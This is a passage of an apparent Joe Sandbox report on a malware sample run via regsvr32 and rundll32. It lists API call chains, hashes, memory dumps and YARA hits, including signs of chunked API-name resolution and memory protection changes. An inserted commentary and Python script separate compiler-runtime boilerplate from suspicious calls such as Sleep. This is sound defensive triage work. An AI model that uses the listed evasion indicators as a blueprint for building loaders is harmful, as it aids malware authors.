Uniqueness Score: -1.00%

Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 66c2a68ae6921ce3eae9ed6cb47659e8359417b2a45b1d2ea151f135524af05a
• Instruction ID: 183950c0a67478672c510f893ce4302b2523286902b90e5598542ec00ee2d96c
• Opcode Fuzzy Hash: 66c2a68ae6921ce3eae9ed6cb47659e8359417b2a45b1d2ea151f135524af05a
• Instruction Fuzzy Hash: F5B18F32B18B4285EB24DB62E4407AA77E4FB89764F505531EA8E437B5EF3CE105C741
Uniqueness
Uniqueness Score: -1.00%

Similarity
• API ID: free$Sleep_errno
• String ID:
• API String ID: 2081351063-0
• Opcode ID: ec136e1b37b0cf75a1e1cbd0173697211363db55ec0de315659f58b3930cb5b5
• Instruction ID: df010dba4cad495ee0012634bb63d17df3731ef51058b10ac5d7c33e0e835c64
• Opcode Fuzzy Hash: ec136e1b37b0cf75a1e1cbd0173697211363db55ec0de315659f58b3930cb5b5
• Instruction Fuzzy Hash: 6E313921B0965381EB15AB25C4A137976EAAF85FE4F489035DE0D0B3FADE2CE8008342
Uniqueness
Uniqueness Score: -1.00%

APIs
• DecodePointer.KERNEL32(?,?,?,00007FFFEFB973E5,?,?,?,?,00007FFFEFB934D2,?,?,?,00007FFFEFB921CB), ref: 00007FFFEFB972FD
• DecodePointer.KERNEL32(?,?,?,00007FFFEFB973E5,?,?,?,?,00007FFFEFB934D2,?,?,?,00007FFFEFB921CB), ref: 00007FFFEFB9730C
• EncodePointer.KERNEL32(?,?,?,00007FFFEFB973E5,?,?,?,?,00007FFFEFB934D2,?,?,?,00007FFFEFB921CB), ref: 00007FFFEFB97389
  • Part of subcall function 00007FFFEFB9318C: realloc.LIBCMT ref: 00007FFFEFB931B7
  • Part of subcall function 00007FFFEFB9318C: Sleep.KERNEL32(?,?,00000000,00007FFFEFB97379,?,?,?,00007FFFEFB973E5,?,?,?,?,00007FFFEFB934D2), ref: 00007FFFEFB931D3
• EncodePointer.KERNEL32(?,?,?,00007FFFEFB973E5,?,?,?,?,00007FFFEFB934D2,?,?,?,00007FFFEFB921CB), ref: 00007FFFEFB97398
• EncodePointer.KERNEL32(?,?,?,00007FFFEFB973E5,?,?,?,?,00007FFFEFB934D2,?,?,?,00007FFFEFB921CB), ref: 00007FFFEFB973A4
Similarity
• API ID: Pointer$Encode$Decode$Sleep_errnorealloc
• String ID:
• API String ID: 1310268301-0
• Opcode ID: 45f99762a2f7ec127277c333d1f44571b1c8f3f0bb701b28e9aac5b400b42b2d
• Instruction ID: dbdc7b80e8a76b5de984e995649729ae2e1f7dc619c3f3de612ce452dd74ed69
• Opcode Fuzzy Hash: 45f99762a2f7ec127277c333d1f44571b1c8f3f0bb701b28e9aac5b400b42b2d
• Instruction Fuzzy Hash: 1E219011F0D64351EE10AB21E9442BAB3E1BB45BE0F944839D90D0BBF6DE7CE096C302
Uniqueness
Uniqueness Score: -1.00%

Similarity
• API ID: Pointer$Encode$Decode$Sleep_errnorealloc
• String ID:
• API String ID: 1310268301-0
• Opcode ID: eece0b224e2bcc70f9921190d9f8722cba86776407b6ce9ac89865c4675fc459
• Instruction ID: 02b6f042f5e471cac0de196745a53613a0ceaeb37e136edf1dfb6b978383cb9f
• Opcode Fuzzy Hash: eece0b224e2bcc70f9921190d9f8722cba86776407b6ce9ac89865c4675fc459
• Instruction Fuzzy Hash: 4A215021B1DA8394EE54EB11A644379B2E1AB46BE0F984435E95D07BF6DE3CF055C302
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(?,?,000000FF,00007FFFEFB93359,?,?,00000028,00007FFFEFB96C7D,?,?,00000000,00007FFFEFB930C0,?,?,00000000,00007FFFEFB96B19), ref: 00007FFFEFB9331F
• GetProcAddress.KERNEL32(?,?,000000FF,00007FFFEFB93359,?,?,00000028,00007FFFEFB96C7D,?,?,00000000,00007FFFEFB930C0,?,?,00000000,00007FFFEFB96B19), ref: 00007FFFEFB93334
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                • API String ID: 1646373207-1276376045
                                                                                                                                • Opcode ID: d72bc5d50b22d09011b632762878156ef0257bf259d16f3c3461911ef1dd3856
                                                                                                                                • Instruction ID: 7b6ebba1ba3b4267af1d655181db507b79902e96915ae707c01f0e98facecfe8
                                                                                                                                • Opcode Fuzzy Hash: d72bc5d50b22d09011b632762878156ef0257bf259d16f3c3461911ef1dd3856
                                                                                                                                • Instruction Fuzzy Hash: 3EE01250F59E0341FE595B50A88433432D06F59B30B4C543DC81F067F0EE6CA6A8C311
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FFFEFB9309C: Sleep.KERNEL32(?,?,00000000,00007FFFEFB96B19,?,?,00000000,00007FFFEFB96BC3,?,?,?,?,?,?,00000000,00007FFFEFB92DC8), ref: 00007FFFEFB930D2
• free.LIBCMT ref: 00007FFFEFB958A5
• free.LIBCMT ref: 00007FFFEFB958C1
  • Part of subcall function 00007FFFEFB96550: RtlCaptureContext.KERNEL32 ref: 00007FFFEFB9658F
  • Part of subcall function 00007FFFEFB96550: IsDebuggerPresent.KERNEL32 ref: 00007FFFEFB9662D
  • Part of subcall function 00007FFFEFB96550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFFEFB96637
  • Part of subcall function 00007FFFEFB96550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFFEFB96642
  • Part of subcall function 00007FFFEFB96550: GetCurrentProcess.KERNEL32 ref: 00007FFFEFB96658
  • Part of subcall function 00007FFFEFB96550: TerminateProcess.KERNEL32 ref: 00007FFFEFB96666
• free.LIBCMT ref: 00007FFFEFB958D6
  • Part of subcall function 00007FFFEFB93024: HeapFree.KERNEL32(?,?,00000000,00007FFFEFB92DDC,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9303A
  • Part of subcall function 00007FFFEFB93024: _errno.LIBCMT ref: 00007FFFEFB93044
  • Part of subcall function 00007FFFEFB93024: GetLastError.KERNEL32(?,?,00000000,00007FFFEFB92DDC,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9304C
• free.LIBCMT ref: 00007FFFEFB958F5
• free.LIBCMT ref: 00007FFFEFB95911
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: free$ExceptionFilterProcessUnhandled_errno$CaptureContextCurrentDebuggerErrorFreeHeapLastPresentSleepTerminate
• String ID:
• API String ID: 2294642566-0
• Opcode ID: dc7ff44f8b32ef672d501b76c056c74ad4bf38a7a2c0d5bc14e1adea1997e9e3
• Instruction ID: c0b1fc6867400ea9d56b464085d40bd23596a06719896f0c00a828ed481ab1de
• Opcode Fuzzy Hash: dc7ff44f8b32ef672d501b76c056c74ad4bf38a7a2c0d5bc14e1adea1997e9e3
• Instruction Fuzzy Hash: 56518F36B04A8682EB219F2AE85026E33D5FB84BA8F584035DE4D477F8DE3CD946C341
Uniqueness

Uniqueness Score: -1.00%

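The entry above is worth a triage caveat. The RtlCaptureContext, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess sequence inside subcall function 00007FFFEFB96550 is the call chain of the MSVC CRT's security-failure handler (the __report_gsfailure / _invoke_watson path that a /GS stack-cookie mismatch ends in), and the HeapFree / _errno / GetLastError trio in 00007FFFEFB93024 is the CRT's free() wrapper. The report's "Contains functionality to check if a debugger is running (IsDebuggerPresent)" signature is therefore satisfied by compiler-emitted boilerplate here, and is weak evidence of deliberate anti-debugging on its own; the Sleep reached through 00007FFFEFB9309C is not explained by any such chain and is the call that merits a look. The script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses the "APIs" lines of an entry in this format, groups the calls by the subcall function they belong to, matches each group against a small table of known CRT chains (the table is my own, kept to the three chains visible on this page), and lists the suspicious APIs that no CRT chain accounts for. The sample input is a constructed copy of this entry's lines with the long argument lists shortened.

```python
import re
from collections import defaultdict

# Constructed sample: the "APIs" block of the entry above, argument lists
# shortened. The real report lines carry the full argument snapshots.
SAMPLE_APIS = """
• Part of subcall function 00007FFFEFB9309C: Sleep.KERNEL32(?,?,00000000,00007FFFEFB96B19), ref: 00007FFFEFB930D2
• free.LIBCMT ref: 00007FFFEFB958A5
• free.LIBCMT ref: 00007FFFEFB958C1
• Part of subcall function 00007FFFEFB96550: RtlCaptureContext.KERNEL32 ref: 00007FFFEFB9658F
• Part of subcall function 00007FFFEFB96550: IsDebuggerPresent.KERNEL32 ref: 00007FFFEFB9662D
• Part of subcall function 00007FFFEFB96550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFFEFB96637
• Part of subcall function 00007FFFEFB96550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFFEFB96642
• Part of subcall function 00007FFFEFB96550: GetCurrentProcess.KERNEL32 ref: 00007FFFEFB96658
• Part of subcall function 00007FFFEFB96550: TerminateProcess.KERNEL32 ref: 00007FFFEFB96666
• free.LIBCMT ref: 00007FFFEFB958D6
• Part of subcall function 00007FFFEFB93024: HeapFree.KERNEL32(?,?,00000000,00007FFFEFB92DDC), ref: 00007FFFEFB9303A
• Part of subcall function 00007FFFEFB93024: _errno.LIBCMT ref: 00007FFFEFB93044
• Part of subcall function 00007FFFEFB93024: GetLastError.KERNEL32(?,?,00000000,00007FFFEFB92DDC), ref: 00007FFFEFB9304C
"""

# One report line: optional "Part of subcall function <addr>:" prefix,
# then Name.MODULE, optional "(args)", then "ref: <addr>".
_API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Known compiler-runtime call chains (my own table, assumption: limited to the
# MSVC CRT chains that appear on this page). A callee whose API set contains a
# whole chain is treated as CRT boilerplate rather than sample logic.
CRT_CHAINS = [
    ("MSVC CRT security-failure handler (__report_gsfailure / _invoke_watson)",
     frozenset({"RtlCaptureContext", "IsDebuggerPresent",
                "SetUnhandledExceptionFilter", "UnhandledExceptionFilter",
                "GetCurrentProcess", "TerminateProcess"})),
    ("MSVC CRT free() wrapper",
     frozenset({"HeapFree", "_errno", "GetLastError"})),
    ("MSVC CRT code-page initialisation",
     frozenset({"GetOEMCP", "IsValidCodePage", "GetCPInfo"})),
]

# APIs that sandbox signatures commonly flag as anti-analysis.
SUSPICIOUS = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent", "Sleep"}


def parse_api_block(text):
    """Turn the report's API lines into records; non-matching lines are skipped."""
    records = []
    for line in text.splitlines():
        m = _API_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        records.append({
            "name": m.group("name"),
            "module": m.group("module"),
            "args": args.split(",") if args else [],
            "ref": int(m.group("ref"), 16),
            # None means the call sits directly in the analysed function.
            "subcall": int(m.group("sub"), 16) if m.group("sub") else None,
        })
    return records


def group_by_callee(records):
    """Map each subcall address (None for direct calls) to the APIs it reaches."""
    groups = defaultdict(set)
    for r in records:
        groups[r["subcall"]].add(r["name"])
    return dict(groups)


def classify(records):
    """Label every callee whose API set fully contains a known CRT chain."""
    labels = {}
    for callee, names in group_by_callee(records).items():
        for label, chain in CRT_CHAINS:
            if chain <= names:
                labels[callee] = label
    return labels


def unexplained_suspicious(records):
    """Suspicious APIs reached through callees that no CRT chain explains."""
    labels = classify(records)
    return sorted({r["name"] for r in records
                   if r["name"] in SUSPICIOUS and r["subcall"] not in labels})


if __name__ == "__main__":
    recs = parse_api_block(SAMPLE_APIS)
    for callee, label in classify(recs).items():
        print(f"{callee:016X}: {label}")
    print("needs a look:", unexplained_suspicious(recs))
```

Run against the sample, the two CRT callees come back labelled and only Sleep is left as an unexplained suspicious call. Feeding the script the full "APIs" blocks of a report rather than one entry gives a quick map of which flagged behaviours are compiler runtime and which belong to the sample.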
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: free$ErrorLastSleep
• String ID: Qr2_:g
• API String ID: 2707005668-1052752507
• Opcode ID: 8a0e4bcb2f8f055484fc494bcbea3fb58e24d6b1b1717c77fb83df74190ce727
• Instruction ID: 4d3d9c95ac98e6a1b15babe5178714a6abf397029d37eb8291ef14f85f247b66
• Opcode Fuzzy Hash: 8a0e4bcb2f8f055484fc494bcbea3fb58e24d6b1b1717c77fb83df74190ce727
• Instruction Fuzzy Hash: 4F41F122B0CA9342F7618621A8117BA76C4BF4ABE8F504134ED4C477F6EF3CE8018702
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: _lock$DecodePointer_errno_getptd
• String ID:
• API String ID: 4201827665-0
• Opcode ID: 80346bd32cbc0638794b0fd1901a532c5b35ee42fd123eebcbfe5a7804c514a3
• Instruction ID: f7c2b3c16981ce476297450476d1acab1174ab65751c5bd39773920077e693f1
• Opcode Fuzzy Hash: 80346bd32cbc0638794b0fd1901a532c5b35ee42fd123eebcbfe5a7804c514a3
• Instruction Fuzzy Hash: 46516871A08A8382FB54EB25A8517BA32DAFF457A0F104039DE5E477F2DE7DE4408702
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: _errno$DecodePointercalloc
• String ID:
• API String ID: 1531210114-0
• Opcode ID: 135c3f51b5ce2e738d355fd0c7e716948f0291e158272fe6257324d9ebc5dc22
• Instruction ID: b6d09dd5ac7c382c27291425e9ac92ab9c67435a2933ad9dad1f579822f0fa70
• Opcode Fuzzy Hash: 135c3f51b5ce2e738d355fd0c7e716948f0291e158272fe6257324d9ebc5dc22
• Instruction Fuzzy Hash: BE217F32A1874346FB559B65A41137A72E1AF547E4F488134EF4C47BFADF3CE8108602
Uniqueness

Uniqueness Score: -1.00%

APIs
• _lock.LIBCMT ref: 00007FFFEFB953B2
• free.LIBCMT ref: 00007FFFEFB953D7
  • Part of subcall function 00007FFFEFB93024: HeapFree.KERNEL32(?,?,00000000,00007FFFEFB92DDC,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9303A
  • Part of subcall function 00007FFFEFB93024: _errno.LIBCMT ref: 00007FFFEFB93044
  • Part of subcall function 00007FFFEFB93024: GetLastError.KERNEL32(?,?,00000000,00007FFFEFB92DDC,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9304C
• _lock.LIBCMT ref: 00007FFFEFB953F2
• free.LIBCMT ref: 00007FFFEFB95438
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: _lockfree$ErrorFreeHeapLast_errno
• String ID:
• API String ID: 3188102813-0
• Opcode ID: 09c59b142491067d37077feec729aeb8b77d96716ac98985a4df9f6db3f8d771
• Instruction ID: 0728965f31d15c834a5b2028cda61261e956e5745244197330dbb999b6177115
• Opcode Fuzzy Hash: 09c59b142491067d37077feec729aeb8b77d96716ac98985a4df9f6db3f8d771
• Instruction Fuzzy Hash: 86116121A4A50385FF959BB0D46137A33D59F80774F089135D61F463F9DE6CA8418323
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: CriticalDeleteSection$Freefree
• String ID:
• API String ID: 1250194111-0
• Opcode ID: 0b4381b0394cf9d2fe44ee79bc2f59f9ea8a8cfc0730820b202f43bccc0e215f
• Instruction ID: 3300e3426b6fe67e2b24dfe71e41b459bca6ce8fd963c28290c56bbb7968c007
• Opcode Fuzzy Hash: 0b4381b0394cf9d2fe44ee79bc2f59f9ea8a8cfc0730820b202f43bccc0e215f
• Instruction Fuzzy Hash: 87116A31E49A4386EA248B15E84033873E6FB54B60F588631DA6D02AF5CF3CE8A18702
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: _lock$Sleep_errno_getptd
• String ID:
• API String ID: 2111406555-0
• Opcode ID: 673e868a23441bf53d2040884fedd38da7dd7cebd98ae69a44e812092c6a0ba8
• Instruction ID: ee27f5b9bcffbbc4c56a83580f4a2c028045a12a5b12db8ae7cbf482e6c5010f
• Opcode Fuzzy Hash: 673e868a23441bf53d2040884fedd38da7dd7cebd98ae69a44e812092c6a0ba8
• Instruction Fuzzy Hash: 10017C21B0968386F7446BB5D4527AE72E5EF84BA4F448034DB0D473F6DE2CE8548363
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FFFEFB9497C: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,00007FFFEFB94D0E,?,?,?,?,?,00007FFFEFB94EE3), ref: 00007FFFEFB949A6
• IsValidCodePage.KERNEL32(?,?,?,00000000,00000000,00000000,?,00007FFFEFB94D54,?,?,?,?,?,00007FFFEFB94EE3), ref: 00007FFFEFB94A8F
• GetCPInfo.KERNEL32(?,?,?,00000000,00000000,00000000,?,00007FFFEFB94D54,?,?,?,?,?,00007FFFEFB94EE3), ref: 00007FFFEFB94AA4
Strings
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: CodeInfoPageValid
• String ID: Qr2_:g
• API String ID: 546120528-1052752507
• Opcode ID: 72c8b2ce235c501ef4ec931ba07555e840291472543b62dc7a7db70925693586
• Instruction ID: 4bec80c7e3e26f6861bd30a3dbfd350276709376f38160d418cad4d7aa813dc8
• Opcode Fuzzy Hash: 72c8b2ce235c501ef4ec931ba07555e840291472543b62dc7a7db70925693586
• Instruction Fuzzy Hash: 5671CDA6A0C2C38AEB748B28945037D7AE1AB44364F55C036D35E4BAF5DE3CE945C302
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: _errno$_getptd
• String ID: #
• API String ID: 3432092939-1885708031
• Opcode ID: 9b19af0c0418e3e0b258a70cd69edc5393c065aacbb8da76a6c44f52b7c881eb
• Instruction ID: 43012dce8262c1e7a8b8e4026691ce28a844be6da63352c1833dc9316a4c025d
• Opcode Fuzzy Hash: 9b19af0c0418e3e0b258a70cd69edc5393c065aacbb8da76a6c44f52b7c881eb
• Instruction Fuzzy Hash: C7518122A0C68685E7258B25E4403BE7BF1FB81BA4F588131DA9D13BF5CE3DD941CB02
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: Info
• String ID: $Qr2_:g
• API String ID: 1807457897-685489000
• Opcode ID: b31e36affa350c7b49d340973ea7f63d4eadedef633cb9bf82144208f1b26073
• Instruction ID: f5360156b1ca98e751a5b7117ba59b8f07dbab938c3775aa81e3a5142a1125a0
• Opcode Fuzzy Hash: b31e36affa350c7b49d340973ea7f63d4eadedef633cb9bf82144208f1b26073
• Instruction Fuzzy Hash: 5B517C32A1C6C2C6E321CF24E0843AEBBE1F789754F548236DA8947AA5DB7DD546CB01
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: b79b3224c3083f646637f6279f6889a3266e8c7020fbd897531d60d37c45b2be
• Instruction ID: 5c94012679f0979d9b8caac72cf7c9abd2f709459e8bf89965e007b2be9f6cb6
• Opcode Fuzzy Hash: b79b3224c3083f646637f6279f6889a3266e8c7020fbd897531d60d37c45b2be
• Instruction Fuzzy Hash: 4B51BF32B0868786EAA49F16E4803B977E4BB49BA0F544531DB9E077F1DE3CE542C302
Uniqueness
Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 10.7%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 11
Total number of Limit Nodes: 0

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.240752664.0000014E051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E051A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_14e051a0000_rundll32.jbxd
Similarity
• API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
• String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
• API String ID: 394283112-2517549848
• Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
• Instruction ID: 9fce8db5c99b4c9a07128aa5868b493946773de34f43bda5b67a934a5238c262
• Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
• Instruction Fuzzy Hash: 1E72D430618E488BDB69DF18C8897F9B7E1FB98308F10462DE89AC3251DB74D546CB85
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
Yara matches
Similarity
• API ID:
• String ID: #C$(I$-:$Ekf$<W$Z$l$l
• API String ID: 0-464535774
• Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
• Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
• Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
• Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
Yara matches
Similarity
• API ID:
• String ID: )|x$/Zb$/v|$OV4T$\$lA
• API String ID: 0-3528011396
• Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
• Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
• Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
